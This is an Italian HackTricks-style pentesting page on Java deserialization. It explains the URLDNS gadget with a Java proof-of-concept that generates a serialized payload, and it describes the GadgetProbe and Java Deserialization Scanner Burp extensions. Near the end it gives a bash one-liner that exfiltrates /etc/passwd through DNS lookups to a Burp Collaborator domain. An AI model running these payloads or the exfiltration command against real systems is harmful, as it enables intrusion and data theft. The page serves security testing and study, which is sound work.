# Java DNS Deserialization, GadgetProbe e Java Deserialization Scanner

{{#include ../../banners/hacktricks-training.md}}

## Richiesta DNS sulla deserializzazione

La classe `java.net.URL` implementa `Serializable`, questo significa che questa classe può essere serializzata.
```java
public final class URL implements java.io.Serializable {
```
Questa classe ha un **comportamento curioso.** Dalla documentazione: “**Due host sono considerati equivalenti se entrambi i nomi host possono essere risolti negli stessi indirizzi IP**”.\
Quindi, ogni volta che un oggetto URL chiama **qualsiasi** delle **funzioni `equals`** o **`hashCode`**, una **richiesta DNS** per ottenere l'indirizzo IP verrà **inviata**.

**Chiamare** la funzione **`hashCode`** **da** un oggetto **URL** è abbastanza semplice, è sufficiente inserire questo oggetto all'interno di un `HashMap` che verrà deserializzato. Questo perché **alla fine** della funzione **`readObject`** di `HashMap` viene eseguito questo codice:
```java
private void readObject(java.io.ObjectInputStream s)
throws IOException, ClassNotFoundException {
[   ...   ]
for (int i = 0; i < mappings; i++) {
[   ...   ]
putVal(hash(key), key, value, false, false);
}
```
Verrà **eseguito** `putVal` con ogni valore all'interno del `HashMap`. Ma, più rilevante è la chiamata a `hash` con ogni valore. Questo è il codice della funzione `hash`:
```java
static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}
```
Come puoi osservare, **quando deserializzi** un **`HashMap`** la funzione `hash` verrà **eseguita con ogni oggetto** e **durante** l'esecuzione del **`hash`** **verrà eseguito** `.hashCode()` dell'oggetto. Pertanto, se **deserializzi** un **`HashMap`** **contenente** un oggetto **URL**, l'**oggetto URL** eseguirà **`.hashCode()`**.

Ora, diamo un'occhiata al codice di `URLObject.hashCode()`:
```java
public synchronized int hashCode() {
if (hashCode != -1)
return hashCode;

hashCode = handler.hashCode(this);
return hashCode;
```
Come puoi vedere, quando un `URLObject` esegue `.hashCode()`, viene chiamato `hashCode(this)`. Una continuazione puoi vedere il codice di questa funzione:
```java
protected int hashCode(URL u) {
int h = 0;

// Generate the protocol part.
String protocol = u.getProtocol();
if (protocol != null)
h += protocol.hashCode();

// Generate the host part.
InetAddress addr = getHostAddress(u);
[   ...   ]
```
Puoi vedere che viene eseguito un `getHostAddress` sul dominio, **lanciando una query DNS**.

Pertanto, questa classe può essere **abusata** per **lanciare** una **query DNS** per **dimostrare** che la **deserializzazione** è possibile, o anche per **esfiltrare informazioni** (puoi aggiungere come sottodominio l'output di un'esecuzione di comando).

### Esempio di codice payload URLDNS

Puoi trovare il [codice payload URDNS di ysoserial qui](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java). Tuttavia, solo per rendere più facile capire come codificarlo, ho creato il mio PoC (basato su quello di ysoserial):
```java
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;
import java.net.URL;

public class URLDNS {
public static void GeneratePayload(Object instance, String file)
throws Exception {
//Serialize the constructed payload and write it to the file
File f = new File(file);
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
out.writeObject(instance);
out.flush();
out.close();
}
public static void payloadTest(String file) throws Exception {
//Read the written payload and deserialize it
ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
Object obj = in.readObject();
System.out.println(obj);
in.close();
}

public static void main(final String[] args) throws Exception {
String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
HashMap ht = new HashMap(); // HashMap that will contain the URL
URLStreamHandler handler = new SilentURLStreamHandler();
URL u = new URL(null, url, handler); // URL to use as the Key
ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.

// During the put above, the URL's hashCode is calculated and cached.
// This resets that so the next time hashCode is called a DNS lookup will be triggered.
final Field field = u.getClass().getDeclaredField("hashCode");
field.setAccessible(true);
field.set(u, -1);

//Test the payloads
GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
}
}


class SilentURLStreamHandler extends URLStreamHandler {

protected URLConnection openConnection(URL u) throws IOException {
return null;
}

protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
}
```
### Maggiori informazioni

- [https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
- Nell'idea originale il payload delle commons collections è stato modificato per eseguire una query DNS, questo era meno affidabile rispetto al metodo proposto, ma questo è il post: [https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)

## GadgetProbe

Puoi scaricare [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) dal Burp Suite App Store (Extender).

**GadgetProbe** cercherà di capire se alcune **classi Java esistono** sulla classe Java del server in modo da sapere **se** è **vulnerabile** a qualche exploit noto.

### Come funziona

**GadgetProbe** utilizzerà lo stesso **payload DNS della sezione precedente** ma **prima** di eseguire la query DNS cercherà di **deserializzare una classe arbitraria**. Se la **classe arbitraria esiste**, la **query DNS** sarà **inviata** e GadgetProbe annoterà che questa classe esiste. Se la **richiesta DNS** non viene **mai inviata**, questo significa che la **classe arbitraria non è stata deserializzata** con successo, quindi o non è presente o non è **serializzabile/sfruttabile**.

All'interno di github, [**GadgetProbe ha alcune wordlist**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) con classi Java da testare.

![https://github.com/BishopFox/GadgetProbe/blob/master/assets/intruder4.gif](<../../images/intruder4 (1) (1).gif>)

### Maggiori informazioni

- [https://know.bishopfox.com/research/gadgetprobe](https://know.bishopfox.com/research/gadgetprobe)

## Scanner di Deserializzazione Java

Questo scanner può essere **scaricato** dal Burp App Store (**Extender**).\
L'**estensione** ha capacità **passive** e attive.

### Passivo

Per impostazione predefinita, **controlla passivamente** tutte le richieste e le risposte inviate **cercando** i **byte magici serializzati Java** e presenterà un avviso di vulnerabilità se ne trova uno:

![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](<../../images/image (765).png>)

### Attivo

**Test Manuale**

Puoi selezionare una richiesta, fare clic con il tasto destro e `Invia richiesta a DS - Test Manuale`.\
Poi, all'interno della scheda _Deserialization Scanner_ --> _scheda Test Manuale_ puoi selezionare il **punto di inserimento**. E **lanciare il test** (Seleziona l'attacco appropriato a seconda della codifica utilizzata).

![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](../../images/3-1.png)

Anche se questo è chiamato "Test Manuale", è piuttosto **automatizzato**. Controlla automaticamente se la **deserializzazione** è **vulnerabile** a **qualunque payload ysoserial** controllando le librerie presenti sul server web e evidenzierà quelle vulnerabili. Per **controllare** le **librerie vulnerabili** puoi scegliere di lanciare **Javas Sleeps**, **sleeps** tramite **consumo CPU**, o usando **DNS** come è stato precedentemente menzionato.

**Sfruttamento**

Una volta identificata una libreria vulnerabile, puoi inviare la richiesta alla _Scheda di Sfruttamento_.\
In questa scheda devi **selezionare** di nuovo il **punto di iniezione**, **scrivere** la **libreria vulnerabile** per cui vuoi creare un payload e il **comando**. Poi, premi semplicemente il pulsante **Attacco** appropriato.

![https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](../../images/4.png)

### Informazioni sulla DNS Exfil di Deserializzazione Java

Fai eseguire al tuo payload qualcosa di simile al seguente:
```bash
(i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)
```
### Maggiori informazioni

- [https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/)

{{#include ../../banners/hacktricks-training.md}}